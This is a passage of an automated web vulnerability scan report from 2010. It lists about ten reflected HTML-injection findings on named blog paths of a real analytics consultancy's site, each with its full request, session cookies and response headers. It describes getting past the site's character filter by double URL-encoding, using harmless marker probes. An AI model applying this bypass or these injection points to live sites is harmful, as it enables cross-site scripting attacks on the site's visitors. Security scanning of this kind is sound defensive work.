The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f593c%2522%253e%253ca%253ebd157d383e4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f593c\\\"><a>bd157d383e4 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /blog/62-urchin.html?f593c%2522%253e%253ca%253ebd157d383e4=1 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/62-urchin/118-urchin-7-now-available.html?itemid=70#comment Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 03:28:16 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 03:28:16 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 03:28:16 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 28245
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
2.5. http://www.analyticspros.com/blog/62-urchin/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.analyticspros.com
Path:
/blog/62-urchin/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a5cb%2522%253e%253ca%253eb937581de21 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7a5cb\\\"><a>b937581de21 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /blog/62-urchin/?7a5cb%2522%253e%253ca%253eb937581de21=1 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:21:36 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 04:21:40 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 04:21:40 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 28128
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
2.6. http://www.analyticspros.com/blog/googleanalytics.feed [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.analyticspros.com
Path:
/blog/googleanalytics.feed
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1881%2522%253e%253ca%253e6151fe23563 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f1881\\\"><a>6151fe23563 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /blog/googleanalytics.feed?f1881%2522%253e%253ca%253e6151fe23563=1 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 03:29:12 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 03:29:13 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 03:29:13 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 29235
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
2.7. http://www.analyticspros.com/blog/googleanalytics.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.analyticspros.com
Path:
/blog/googleanalytics.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14059%2522%253e%253ca%253e7504e594467 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 14059\\\"><a>7504e594467 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /blog/googleanalytics.html?14059%2522%253e%253ca%253e7504e594467=1 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/consulting.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 02:15:17 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 02:15:18 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 02:15:18 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 29563
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
2.8. http://www.analyticspros.com/blog/googleanalytics/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.analyticspros.com
Path:
/blog/googleanalytics/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a533b%2522%253e%253ca%253e8714ea09282 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a533b\\\"><a>8714ea09282 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /blog/googleanalytics/?a533b%2522%253e%253ca%253e8714ea09282=1 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:50:36 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 05:50:37 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 05:50:37 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 29506
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
2.9. http://www.analyticspros.com/blog/seo.feed [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.analyticspros.com
Path:
/blog/seo.feed
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ae0a%2522%253e%253ca%253e65f16b0f7c7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2ae0a\\\"><a>65f16b0f7c7 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /blog/seo.feed?2ae0a%2522%253e%253ca%253e65f16b0f7c7=1 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/seo.feed?type=atom Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 03:29:05 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 03:29:07 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 03:29:07 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 21694
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
2.10. http://www.analyticspros.com/blog/seo/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.analyticspros.com
Path:
/blog/seo/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba0ce%2522%253e%253ca%253e5b24d75220f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ba0ce\\\"><a>5b24d75220f in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /blog/seo/?ba0ce%2522%253e%253ca%253e5b24d75220f=1 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:22:16 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 04:22:18 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 04:22:18 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 21900
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
2.11. http://www.analyticspros.com/blog/urchin.feed [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.analyticspros.com
Path:
/blog/urchin.feed
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85bad%2522%253e%253ca%253e1e3632dca04 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 85bad\\\"><a>1e3632dca04 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /blog/urchin.feed?85bad%2522%253e%253ca%253e1e3632dca04=1 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 03:31:25 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 03:31:26 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 03:31:26 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 25133
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
2.12. http://www.analyticspros.com/blog/urchin.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.analyticspros.com
Path:
/blog/urchin.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47929%2522%253e%253ca%253e127687c3284 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 47929\\\"><a>127687c3284 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /blog/urchin.html?47929%2522%253e%253ca%253e127687c3284=1 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/consulting.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:42:32 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:42:33 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 06:42:33 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 25460
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
2.13. http://www.analyticspros.com/blog/urchin/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.analyticspros.com
Path:
/blog/urchin/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d28d%2522%253e%253ca%253e30ce426d9a2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9d28d\\\"><a>30ce426d9a2 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /blog/urchin/?9d28d%2522%253e%253ca%253e30ce426d9a2=1 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:19:31 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 04:19:39 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 04:19:39 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 25404
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
2.14. http://www.analyticspros.com/blog/webanalytics.feed [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.analyticspros.com
Path:
/blog/webanalytics.feed
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0c5b%2522%253e%253ca%253e596218aef01 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d0c5b\\\"><a>596218aef01 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
